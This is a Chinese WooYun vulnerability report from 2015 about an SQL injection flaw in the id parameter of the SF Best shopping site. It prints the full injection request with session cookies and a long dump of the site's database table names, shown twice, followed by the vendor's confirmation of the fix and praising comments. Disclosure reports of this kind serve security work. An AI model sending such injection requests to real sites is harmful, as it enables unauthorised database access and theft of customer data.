当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151167

漏洞标题:顺丰优选主站SQL注射

相关厂商:顺丰优选

漏洞作者: 沦沦

提交时间:2015-11-01 23:20

修复时间:2015-11-02 10:14

公开时间:2015-11-02 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-01: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-02: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

POST /mark/isPlProduct/id/57721*%23/flag/0 HTTP/1.1
Host: www.sfbest.com
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.sfbest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: http://www.sfbest.com/html/products/58/1800057721.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: siteid=SF_CURRENT_SITE; sf_hash_id_cart=edf560a58f010782; _adwr=212484882%230; _da_z=24490488.1446282243.1.1.ccn=(direct)|csr=(direct)|cmd=(none); _SF_AUTH_HASH_=42f55168062b2d9a; _adwp=212484882.5095872663.1446282242.1446282242.1446386055.2; _adwc=212484882; _da_a=24490488.20730402347158.1446282243.1446282243.1446386055.2; _jzqckmp=1; _SF_USER_HASH_=c3cc178e1d6fbec0; provinceid=6; cityid=76; areaid=692; townid=0; returnUrl=http%3A%2F%2Fwww.sfbest.com%2F; _ems_visitor=1417598425.411598059; DA_UID=-18296926; verifyReturnUrl=http%3A%2F%2Fwww.sfbest.com%2F; _GOOGLE_ISLOG_=1; bdshare_firstime=1446386189921; Hm_lvt_56b4bab8080250772f08703b41839413=1446182916,1446282241,1446386054; Hm_lpvt_56b4bab8080250772f08703b41839413=1446386679; _adwb=212484882; _ga=GA1.2.718868376.1446282243; _gat=1; __xsptplus130=130.2.1446386055.1446387144.5%234%7C%7C%7C%7C%7C%23%23vZMth-PwbBu4Zjf2HfNWStnsknrDJ6Aq%23; Hm_lvt_cceda50ef06cbaf44bdeaabe2470efee=1446182927,1446282243,1446386055; Hm_lpvt_cceda50ef06cbaf44bdeaabe2470efee=1446387144; _sf_tj_cc=ionzuq2fn3c1446282243336.1446282243.1446282243.1446386055.2.6.1446387144; _da_b=24490488.4.10.1446386055; _qzja=1.21731326.1446282242803.1446282242803.1446386055382.1446386141651.1446387147757.0.0.0.5.2; _qzjb=1.1446386055382.4.0.0.0; _qzjc=1; _qzjto=4.1.0; _jzqa=1.2286008647312797200.1446282243.1446282243.1446386055.2; _jzqc=1; _jzqb=1.5.10.1446386055.1


id参数没进行过滤

1.png


2.jpg


3.jpg


4.jpg


| gshop_large_customers_activity |
| gshop_large_customers_combo |
| gshop_large_customers_user_list |
| gshop_lc_log |
| gshop_lc_order |
| gshop_lc_order_addr |
| gshop_lc_order_addr_channel |
| gshop_lc_order_paid_info |
| gshop_lc_order_product |
| gshop_marketing_ecard_mobile |
| gshop_member_banners |
| gshop_milk_ip5 |
| gshop_month_sell_modulus |
| gshop_nm_restriction |
| gshop_occupied_number |
| gshop_opencity |
| gshop_opencity_stock |
| gshop_order |
| gshop_order_action_log |
| gshop_order_active |
| gshop_order_active_gift |
| gshop_order_active_product |
| gshop_order_active_statistics |
| gshop_order_card |
| gshop_order_channel |
| gshop_order_coupon_return_detail |
| gshop_order_coupon_return_sync |
| gshop_order_cps |
| gshop_order_delivery |
| gshop_order_ext |
| gshop_order_ext_sfcc |
| gshop_order_history_address |
| gshop_order_invoice |
| gshop_order_log |
| gshop_order_mail |
| gshop_order_package |
| gshop_order_package_detail |
| gshop_order_product |
| gshop_order_product_detail |
| gshop_order_product_money |
| gshop_order_refuse |
| gshop_order_refuse_log |
| gshop_order_send_coupon_log |
| gshop_order_service |
| gshop_order_statistics |
| gshop_order_wxprepare |
| gshop_package_product |
| gshop_package_product_list |
| gshop_package_warehouse |
| gshop_pay_and_settlement |
| gshop_pay_apply |
| gshop_pay_apply_info |
| gshop_pay_detail |
| gshop_pay_list |
| gshop_pay_list_statistics |
| gshop_payment |
| gshop_personal_recommendation |
| gshop_phone_sms |
| gshop_phone_sms_log |
| gshop_platform_department |
| gshop_platform_duty |
| gshop_platform_picture_opt |
| gshop_platform_product_opt |
| gshop_platform_reason |
| gshop_platform_reason_category |
| gshop_platform_return |
| gshop_platform_return_log |
| gshop_platform_return_out |
| gshop_platform_return_product |
| gshop_platform_return_user |
| gshop_platform_shipping_order |
| gshop_pos_product |
| gshop_pos_product_share |
| gshop_pos_saleorder |
| gshop_pos_salepay |
| gshop_ppc |
| gshop_ppc_log |
| gshop_pre_sale |
| gshop_presale_warehouse |
| gshop_present_type |
| gshop_present_use_info |
| gshop_price_protect_info |
| gshop_product |
| gshop_product_activity_flag |
| gshop_product_alias |
| gshop_product_attribute |
| gshop_product_attribute_heike_temp |
| gshop_product_business |
| gshop_product_bussiness_operation_log |
| gshop_product_bussiness_queue |
| gshop_product_change_price_record |
| gshop_product_city |
| gshop_product_converse_recommendation |
| gshop_product_correction |
| gshop_product_cost_price_change |
| gshop_product_detail |
| gshop_product_detail_block_template |
| gshop_product_detail_review |
| gshop_product_detail_template |
| gshop_product_ext_category |
| gshop_product_ext_property |
| gshop_product_ext_property_review |
| gshop_product_finance |
| gshop_product_finance_change |
| gshop_product_giftbag |
| gshop_product_heike |
| gshop_product_importtemp |
| gshop_product_in_price |
| gshop_product_in_price_change |
| gshop_product_in_price_log |
| gshop_product_in_wh |
| gshop_product_in_wh_details |
| gshop_product_link |
| gshop_product_mw_price_log |
| gshop_product_new_tag |
| gshop_product_out_wh |
| gshop_product_out_wh_details |
| gshop_product_outsource |
| gshop_product_outsource_log |
| gshop_product_outsource_picture |
| gshop_product_picture |
| gshop_product_price |
| gshop_product_price_change |
| gshop_product_reduce_price |
| gshop_product_relation |
| gshop_product_sell_detail |
| gshop_product_shipping |
| gshop_product_special |
| gshop_product_special_group |
| gshop_product_stock_set |
| gshop_product_stock_set_review |
| gshop_product_supplier |
| gshop_product_tag |
| gshop_product_temp_review |
| gshop_promotion |
| gshop_promotional_price |
| gshop_promotional_statistics |
| gshop_purchase_order |
| gshop_purchase_order_product |
| gshop_purchase_return_order |
| gshop_purchase_return_product |
| gshop_purchase_return_shipping |
| gshop_qualification_basic |
| gshop_qualification_basic_option |
| gshop_qualification_basic_to_option |
| gshop_qualification_business_attribution |
| gshop_qualification_business_to_basic |
| gshop_ranking |
| gshop_reason |
| gshop_reason_category |
| gshop_receipt |
| gshop_receipt_product |
| gshop_receipt_product_statistics |
| gshop_redressal_inprice |
| gshop_refer_in_price |
| gshop_refund_voucher |
| gshop_refund_voucher_ext |
| gshop_refused_active_statistics |
| gshop_region |
| gshop_region_old |
| gshop_region_warehouse |
| gshop_reissue_invoice |
| gshop_reissue_invoice_order |
| gshop_replenishment_order |
| gshop_replenishment_order_ext |
| gshop_replenishment_order_log |
| gshop_replenishment_product |
| gshop_replenishment_product_detail |
| gshop_replenishment_product_number |
| gshop_replenishment_product_sell |
| gshop_replenishment_product_set |
| gshop_replenishment_product_set_change |
| gshop_replenishment_recommend |
| gshop_replenishment_set |
| gshop_replenishment_set_change |
| gshop_rere_back_product |
| gshop_rere_damaged_product |
| gshop_rere_damaged_reason |
| gshop_rere_receipt |
| gshop_rere_receipt_product |
| gshop_reservation_receiving_date_detail |
| gshop_reservation_receiving_purchase_detail |
| gshop_reservation_receiving_timeframe |
| gshop_return_img |
| gshop_return_product_detail |
| gshop_return_product_info |
| gshop_returns |
| gshop_returns_active |
| gshop_returns_active_gift |
| gshop_returns_active_product |
| gshop_returns_active_statistics |
| gshop_returns_all_statistics |
| gshop_returns_log |
| gshop_returns_news |
| gshop_returns_news_ext |
| gshop_returns_product |
| gshop_returns_product_info |
| gshop_returns_product_info_statistics |
| gshop_returns_product_news |
| gshop_returns_product_statistics |
| gshop_returns_statistics |
| gshop_returns_user |
| gshop_rewrite_order_details |
| gshop_rewrite_returns |
| gshop_routepush |
| gshop_sale_area_template |
| gshop_sale_area_template_detail |
| gshop_score |
| gshop_score_category |
| gshop_score_product |
| gshop_search_price_range |
| gshop_searchengine_keyword |
| gshop_self_activity |
| gshop_self_activity_product |
| gshop_sell_gift_detal |
| gshop_sell_product_detail |
| gshop_sercen_condition |
| gshop_sercen_condition_content |
| gshop_sfv_product_area |
| gshop_sfv_product_area_region |
| gshop_sfv_product_attr |
| gshop_sfv_region |
| gshop_share_mz |
| gshop_shipping |
| gshop_shipping_type |
| gshop_site_warehouse |
| gshop_spoil_order |
| gshop_spoil_order_detail |
| gshop_spoil_reason |
| gshop_spoil_type |
| gshop_statement_of_account |
| gshop_statement_of_account_detail |
| gshop_static_variables |
| gshop_stock |
| gshop_stock_aging |
| gshop_stock_merchant |
| gshop_stock_supplier_mw_change_log |
| gshop_stock_warning |
| gshop_stock_warning_set |
| gshop_storage_rebate_log |
| gshop_subscribe_detail |
| gshop_subscribe_mail |
| gshop_supplier |
| gshop_supplier_apply |
| gshop_supplier_apply_category |
| gshop_supplier_bind |
| gshop_supplier_blacklist |
| gshop_supplier_complaints |
| gshop_supplier_faq |
| gshop_supplier_fms_state |
| gshop_supplier_main |
| gshop_supplier_notice |
| gshop_supplier_notice_relation |
| gshop_supplier_product_stock |
| gshop_supplier_product_upload |
| gshop_supplier_product_upload_img |
| gshop_supplier_retention_money |
| gshop_supplier_retention_money_statistics |
| gshop_supplier_return_address |
| gshop_supplier_stock |
| gshop_swap_product_detail |
| gshop_tag |
| gshop_take |
| gshop_template |
| gshop_template_type |
| gshop_the_bill |
| gshop_timing_tasks |
| gshop_union |
| gshop_union_channel |
| gshop_user_coupon_a |
| gshop_user_service |
| gshop_view_buy_recommendation |
| gshop_warehouse |
| gshop_warehouse_address |
| gshop_warehouse_region |
| gshop_warehouse_region_old |
| gshop_warehouse_temperature |
| gshop_wms_download_order |
| gshop_wms_download_receipt |
| gshop_wms_inventory_balance |
| gshop_wms_inventory_balanceitem |
| gshop_wms_inventory_balanceitem_query_tem |
| gshop_wms_inventory_balanceitem_tem |
| gshop_wms_inventory_trans |
| gshop_wms_is_download |
| gshop_wms_upload_order_status |
| gshop_yaan_product |
| heike_product_redundant |
+----------------------------------------------+

漏洞证明:

POST /mark/isPlProduct/id/57721*%23/flag/0 HTTP/1.1
Host: www.sfbest.com
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.sfbest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: http://www.sfbest.com/html/products/58/1800057721.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: siteid=SF_CURRENT_SITE; sf_hash_id_cart=edf560a58f010782; _adwr=212484882%230; _da_z=24490488.1446282243.1.1.ccn=(direct)|csr=(direct)|cmd=(none); _SF_AUTH_HASH_=42f55168062b2d9a; _adwp=212484882.5095872663.1446282242.1446282242.1446386055.2; _adwc=212484882; _da_a=24490488.20730402347158.1446282243.1446282243.1446386055.2; _jzqckmp=1; _SF_USER_HASH_=c3cc178e1d6fbec0; provinceid=6; cityid=76; areaid=692; townid=0; returnUrl=http%3A%2F%2Fwww.sfbest.com%2F; _ems_visitor=1417598425.411598059; DA_UID=-18296926; verifyReturnUrl=http%3A%2F%2Fwww.sfbest.com%2F; _GOOGLE_ISLOG_=1; bdshare_firstime=1446386189921; Hm_lvt_56b4bab8080250772f08703b41839413=1446182916,1446282241,1446386054; Hm_lpvt_56b4bab8080250772f08703b41839413=1446386679; _adwb=212484882; _ga=GA1.2.718868376.1446282243; _gat=1; __xsptplus130=130.2.1446386055.1446387144.5%234%7C%7C%7C%7C%7C%23%23vZMth-PwbBu4Zjf2HfNWStnsknrDJ6Aq%23; Hm_lvt_cceda50ef06cbaf44bdeaabe2470efee=1446182927,1446282243,1446386055; Hm_lpvt_cceda50ef06cbaf44bdeaabe2470efee=1446387144; _sf_tj_cc=ionzuq2fn3c1446282243336.1446282243.1446282243.1446386055.2.6.1446387144; _da_b=24490488.4.10.1446386055; _qzja=1.21731326.1446282242803.1446282242803.1446386055382.1446386141651.1446387147757.0.0.0.5.2; _qzjb=1.1446386055382.4.0.0.0; _qzjc=1; _qzjto=4.1.0; _jzqa=1.2286008647312797200.1446282243.1446282243.1446386055.2; _jzqc=1; _jzqb=1.5.10.1446386055.1


id参数没进行过滤

1.png


2.jpg


3.jpg


4.jpg


| gshop_large_customers_activity |
| gshop_large_customers_combo |
| gshop_large_customers_user_list |
| gshop_lc_log |
| gshop_lc_order |
| gshop_lc_order_addr |
| gshop_lc_order_addr_channel |
| gshop_lc_order_paid_info |
| gshop_lc_order_product |
| gshop_marketing_ecard_mobile |
| gshop_member_banners |
| gshop_milk_ip5 |
| gshop_month_sell_modulus |
| gshop_nm_restriction |
| gshop_occupied_number |
| gshop_opencity |
| gshop_opencity_stock |
| gshop_order |
| gshop_order_action_log |
| gshop_order_active |
| gshop_order_active_gift |
| gshop_order_active_product |
| gshop_order_active_statistics |
| gshop_order_card |
| gshop_order_channel |
| gshop_order_coupon_return_detail |
| gshop_order_coupon_return_sync |
| gshop_order_cps |
| gshop_order_delivery |
| gshop_order_ext |
| gshop_order_ext_sfcc |
| gshop_order_history_address |
| gshop_order_invoice |
| gshop_order_log |
| gshop_order_mail |
| gshop_order_package |
| gshop_order_package_detail |
| gshop_order_product |
| gshop_order_product_detail |
| gshop_order_product_money |
| gshop_order_refuse |
| gshop_order_refuse_log |
| gshop_order_send_coupon_log |
| gshop_order_service |
| gshop_order_statistics |
| gshop_order_wxprepare |
| gshop_package_product |
| gshop_package_product_list |
| gshop_package_warehouse |
| gshop_pay_and_settlement |
| gshop_pay_apply |
| gshop_pay_apply_info |
| gshop_pay_detail |
| gshop_pay_list |
| gshop_pay_list_statistics |
| gshop_payment |
| gshop_personal_recommendation |
| gshop_phone_sms |
| gshop_phone_sms_log |
| gshop_platform_department |
| gshop_platform_duty |
| gshop_platform_picture_opt |
| gshop_platform_product_opt |
| gshop_platform_reason |
| gshop_platform_reason_category |
| gshop_platform_return |
| gshop_platform_return_log |
| gshop_platform_return_out |
| gshop_platform_return_product |
| gshop_platform_return_user |
| gshop_platform_shipping_order |
| gshop_pos_product |
| gshop_pos_product_share |
| gshop_pos_saleorder |
| gshop_pos_salepay |
| gshop_ppc |
| gshop_ppc_log |
| gshop_pre_sale |
| gshop_presale_warehouse |
| gshop_present_type |
| gshop_present_use_info |
| gshop_price_protect_info |
| gshop_product |
| gshop_product_activity_flag |
| gshop_product_alias |
| gshop_product_attribute |
| gshop_product_attribute_heike_temp |
| gshop_product_business |
| gshop_product_bussiness_operation_log |
| gshop_product_bussiness_queue |
| gshop_product_change_price_record |
| gshop_product_city |
| gshop_product_converse_recommendation |
| gshop_product_correction |
| gshop_product_cost_price_change |
| gshop_product_detail |
| gshop_product_detail_block_template |
| gshop_product_detail_review |
| gshop_product_detail_template |
| gshop_product_ext_category |
| gshop_product_ext_property |
| gshop_product_ext_property_review |
| gshop_product_finance |
| gshop_product_finance_change |
| gshop_product_giftbag |
| gshop_product_heike |
| gshop_product_importtemp |
| gshop_product_in_price |
| gshop_product_in_price_change |
| gshop_product_in_price_log |
| gshop_product_in_wh |
| gshop_product_in_wh_details |
| gshop_product_link |
| gshop_product_mw_price_log |
| gshop_product_new_tag |
| gshop_product_out_wh |
| gshop_product_out_wh_details |
| gshop_product_outsource |
| gshop_product_outsource_log |
| gshop_product_outsource_picture |
| gshop_product_picture |
| gshop_product_price |
| gshop_product_price_change |
| gshop_product_reduce_price |
| gshop_product_relation |
| gshop_product_sell_detail |
| gshop_product_shipping |
| gshop_product_special |
| gshop_product_special_group |
| gshop_product_stock_set |
| gshop_product_stock_set_review |
| gshop_product_supplier |
| gshop_product_tag |
| gshop_product_temp_review |
| gshop_promotion |
| gshop_promotional_price |
| gshop_promotional_statistics |
| gshop_purchase_order |
| gshop_purchase_order_product |
| gshop_purchase_return_order |
| gshop_purchase_return_product |
| gshop_purchase_return_shipping |
| gshop_qualification_basic |
| gshop_qualification_basic_option |
| gshop_qualification_basic_to_option |
| gshop_qualification_business_attribution |
| gshop_qualification_business_to_basic |
| gshop_ranking |
| gshop_reason |
| gshop_reason_category |
| gshop_receipt |
| gshop_receipt_product |
| gshop_receipt_product_statistics |
| gshop_redressal_inprice |
| gshop_refer_in_price |
| gshop_refund_voucher |
| gshop_refund_voucher_ext |
| gshop_refused_active_statistics |
| gshop_region |
| gshop_region_old |
| gshop_region_warehouse |
| gshop_reissue_invoice |
| gshop_reissue_invoice_order |
| gshop_replenishment_order |
| gshop_replenishment_order_ext |
| gshop_replenishment_order_log |
| gshop_replenishment_product |
| gshop_replenishment_product_detail |
| gshop_replenishment_product_number |
| gshop_replenishment_product_sell |
| gshop_replenishment_product_set |
| gshop_replenishment_product_set_change |
| gshop_replenishment_recommend |
| gshop_replenishment_set |
| gshop_replenishment_set_change |
| gshop_rere_back_product |
| gshop_rere_damaged_product |
| gshop_rere_damaged_reason |
| gshop_rere_receipt |
| gshop_rere_receipt_product |
| gshop_reservation_receiving_date_detail |
| gshop_reservation_receiving_purchase_detail |
| gshop_reservation_receiving_timeframe |
| gshop_return_img |
| gshop_return_product_detail |
| gshop_return_product_info |
| gshop_returns |
| gshop_returns_active |
| gshop_returns_active_gift |
| gshop_returns_active_product |
| gshop_returns_active_statistics |
| gshop_returns_all_statistics |
| gshop_returns_log |
| gshop_returns_news |
| gshop_returns_news_ext |
| gshop_returns_product |
| gshop_returns_product_info |
| gshop_returns_product_info_statistics |
| gshop_returns_product_news |
| gshop_returns_product_statistics |
| gshop_returns_statistics |
| gshop_returns_user |
| gshop_rewrite_order_details |
| gshop_rewrite_returns |
| gshop_routepush |
| gshop_sale_area_template |
| gshop_sale_area_template_detail |
| gshop_score |
| gshop_score_category |
| gshop_score_product |
| gshop_search_price_range |
| gshop_searchengine_keyword |
| gshop_self_activity |
| gshop_self_activity_product |
| gshop_sell_gift_detal |
| gshop_sell_product_detail |
| gshop_sercen_condition |
| gshop_sercen_condition_content |
| gshop_sfv_product_area |
| gshop_sfv_product_area_region |
| gshop_sfv_product_attr |
| gshop_sfv_region |
| gshop_share_mz |
| gshop_shipping |
| gshop_shipping_type |
| gshop_site_warehouse |
| gshop_spoil_order |
| gshop_spoil_order_detail |
| gshop_spoil_reason |
| gshop_spoil_type |
| gshop_statement_of_account |
| gshop_statement_of_account_detail |
| gshop_static_variables |
| gshop_stock |
| gshop_stock_aging |
| gshop_stock_merchant |
| gshop_stock_supplier_mw_change_log |
| gshop_stock_warning |
| gshop_stock_warning_set |
| gshop_storage_rebate_log |
| gshop_subscribe_detail |
| gshop_subscribe_mail |
| gshop_supplier |
| gshop_supplier_apply |
| gshop_supplier_apply_category |
| gshop_supplier_bind |
| gshop_supplier_blacklist |
| gshop_supplier_complaints |
| gshop_supplier_faq |
| gshop_supplier_fms_state |
| gshop_supplier_main |
| gshop_supplier_notice |
| gshop_supplier_notice_relation |
| gshop_supplier_product_stock |
| gshop_supplier_product_upload |
| gshop_supplier_product_upload_img |
| gshop_supplier_retention_money |
| gshop_supplier_retention_money_statistics |
| gshop_supplier_return_address |
| gshop_supplier_stock |
| gshop_swap_product_detail |
| gshop_tag |
| gshop_take |
| gshop_template |
| gshop_template_type |
| gshop_the_bill |
| gshop_timing_tasks |
| gshop_union |
| gshop_union_channel |
| gshop_user_coupon_a |
| gshop_user_service |
| gshop_view_buy_recommendation |
| gshop_warehouse |
| gshop_warehouse_address |
| gshop_warehouse_region |
| gshop_warehouse_region_old |
| gshop_warehouse_temperature |
| gshop_wms_download_order |
| gshop_wms_download_receipt |
| gshop_wms_inventory_balance |
| gshop_wms_inventory_balanceitem |
| gshop_wms_inventory_balanceitem_query_tem |
| gshop_wms_inventory_balanceitem_tem |
| gshop_wms_inventory_trans |
| gshop_wms_is_download |
| gshop_wms_upload_order_status |
| gshop_yaan_product |
| heike_product_redundant |
+----------------------------------------------+

修复方案:

过滤吧

版权声明:转载请注明来源 沦沦@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-02 09:35

厂商回复:

白帽子很棒棒~~~~~~伦伦,好样的~~~~私信个联系方式哈!!!!

最新状态:

2015-11-02:问题已经修复!感谢白帽子~~~~

漏洞评价:

评论

  1. 2015-11-01 23:27 | 玉林嘎 ( 普通白帽子 | Rank:778 漏洞数:98 )

    ...

  2. 2015-11-02 08:25 | BMa ( 普通白帽子 | Rank:1811 漏洞数:202 )

    好样的

  3. 2015-11-02 08:48 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    棒棒哒

  4. 2015-11-02 08:53 | 一只猿 ( 普通白帽子 | Rank:483 漏洞数:90 | 硬件与无线通信研究方向)

    666

  5. 2015-11-02 09:21 | 残冰 ( 普通白帽子 | Rank:187 漏洞数:27 | 专业爆破5000000000000000000000年)

    屌,屌,屌

  6. 2015-11-02 09:35 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    666666666666

  7. 2015-11-02 10:28 | Me_Fortune ( 普通白帽子 | Rank:220 漏洞数:79 | The quiter you are,the more you're able ...)

    有耐心。。。

  8. 2015-11-02 10:29 | an0nym0u5 ( 普通白帽子 | Rank:202 漏洞数:32 )

    真速度

  9. 2015-11-02 10:46 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    @顺丰优选 厂商这速度快啊,赞一个

  10. 2015-11-02 10:57 | 顺丰优选(乌云厂商)

    请大家多关注!优选安全~~~我们会根据漏洞情况发礼物表示感谢~!!同时在北京的朋友,我们安全组请大家吃饭~~~ktv~~~~